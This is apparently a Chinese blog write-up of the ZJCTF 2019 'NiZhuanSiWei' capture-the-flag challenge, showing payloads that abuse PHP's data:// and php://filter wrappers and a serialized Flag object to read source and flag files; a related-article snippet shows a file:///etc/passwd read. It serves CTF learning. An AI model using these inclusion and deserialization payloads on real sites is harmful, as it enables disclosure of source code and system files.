PHP伪协议用法之[ZJCTF 2019]NiZhuanSiWei1

最新推荐文章于 2023-06-04 20:35:32 发布
最新推荐文章于 2023-06-04 20:35:32 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: CTF知识点 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/124131828
版权

php伪协议知识点总结:php伪协议 - single-dog - 博客园

使用data伪协议绕过圆括号、反引号被过滤_梦梦梦·的博客-CSDN博客_data伪协议

首先是代码审计;

传入三个参数。text文本,file文件,password;

第一关是,text传入文本形式可以使用PHP伪协议中的data协议:data://text/plain,<文本>

构造:

text=data://text/plain,welcome to the zjctf

说明text传参正确;第二关对file进行绕过;file里面不能含有/flag/字样;然后提示说有useless.php;如果直接file=useless.php是没有结果的,看到include<file>想到文件包含漏洞,然后就会想到用filter伪协议进行读取内容;那么使用伪协议php://filter 构造:

file=php://filter/read=convert.base64-encode/resource=useless.php

base64编码解码

 

 将flag调用,然后给里面file值赋值为flag.php。就可输出flag.php里面的内容;
当然还要序列化后传入password

对password序列化就要写代码:


<?php

class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$password = new Flag();
echo urlencode(serialize($password));
?>

输出结果:这里使用了 URL编码,可以直接使用;不编码是这样的:

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

反序列漏洞这里有个考点,关于wake_up()函数,将参数加大就可以绕过;

O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

然后构造完整的payload:

?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O%3A4%3A"Flag"%3A1%3A%7Bs%3A4%3A"file"%3Bs%3A8%3A"flag.php"%3B%7D

这里有个细节,完整的payload里面的file不需要再用php://filter协议了;

 

 

一只Traveler
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF题型 php filter特殊编码绕过小汇总
2401_83974590的博客
04-11 683
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
开发过程中,遇到file协议跨域问题,如何在不做任何配置的情况下快速绕过跨域?
charlie________的博客
08-10 553
将下列代码复制到一个bat文件,双击打开即可
php协议.zipphp协议.zip
02-24
php协议php协议.zipphp协议.zip
57-57.渗透测试-PHP相关函数和协议.mp4
最新发布
05-10
57-57.渗透测试-PHP相关函数和协议.mp4
WEB入门——文件包含漏洞与PHP协议
HasntStartIsOver的博客
06-04 879
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。
PHP协议详解
m0_67391521的博客
06-10 280
php支持的协议 1 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。简单通俗的说,这是一个中间件,在读入或写入数据的时候对数据进行处理后输出的一个过程。php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作ph
[ZJCTF 2019]NiZhuanSiWei1
evil_ming的博客
04-23 251
一看就是代码审计啊。打开useless.php 发现空白就想用base64编码来查看。 用个在线php编码的来序列化 构造payload之后访问源码得到flag text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} over. ...
[ZJCTF 2019]NiZhuanSiWei 1
qq_43618536的博客
07-03 304
BUUCTF的[ZJCTF 2019]NiZhuanSiWei 1
php协议.pdfphp协议.pdfphp协议.pdf
02-24
php协议php协议.pdfphp协议.pdf
使用纯php代码实现页面静态的方法
12-18
本文实例讲述了使用纯php代码实现页面静态的方法。分享给大家供大家参考。具体如下: if(1==URLROLE){ $nav=$_SERVER["REQUEST_URI"]; $script_name=$_SERVER["SCRIPT_NAME"]; $nav1=ereg_replace(".html","",...
php协议概述.pdf
02-24
PHP协议是一种特殊的URL协议,用于在PHP中进行文件操作。它允许在URL中指定文件路径,并通过内置的PHP函数来访问和操作文件内容。
Android Webview File同源策略绕过漏洞
糖小七_Zz的博客
05-12 1579
测评目的 检测Apk中WebView的file域协议是否存在同源策略绕过的漏洞 危险等级 高 危害 JavaScript的延时执行能够绕过file协议的同源检查,并能够访问受害应用的所有私有文件,即通过WebView对Javascript的延时执行和将当前Html文件删除掉并软连接指向其他文件就可以读取到被符号链接所指的文件,然后通过JavaScript再次读取HTML文件,即可获取到被符号链接所指的文件。大多数使用WebView的应用都会受到该漏洞的影响,恶意应用通过该漏洞,可在无特殊...
文件包含漏洞&协议
qq_62078839的博客
04-16 2244
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
20210218CTF协议绕过file_get_contents(bugkuctf的web21御结冰城感想)
热门推荐
qq_45290991的博客
02-18 1万+
CTF中常用的php协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
Android安全检测-WebView File域同源策略绕过漏洞
qq_35993502的博客
11-22 7007
这一章我们来学习“WebView File域同源策略绕过漏洞”。 一、漏洞原理
文件包含漏洞及简单绕过
球球的博客
03-18 912
文件包含漏洞,DVWA靶场,pikachu靶场,漏洞原理,防御与绕过
[ZJCTF 2019]NiZhuanSiWei
09-16
[ZJCTF 2019]NiZhuanSiWei是一道CTF比赛的题目,具体解题过程包括序列化与反序列化练习,以及使用POC、EXP、Payload与Shellcode。引用中给出了一个PHP代码段,该代码段包含了对用户输入的处理和判断逻辑。如果用户提供的$text文件内容等于"welcome to the zjctf",则会将该文件内容输出;如果$file文件名中包含"flag"字符,则输出"Not now!";否则,会包含$file所指向的文件,并对$password进行反序列化操作后输出。如果以上条件都不满足,则会将整个文件的代码进行高亮显示。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值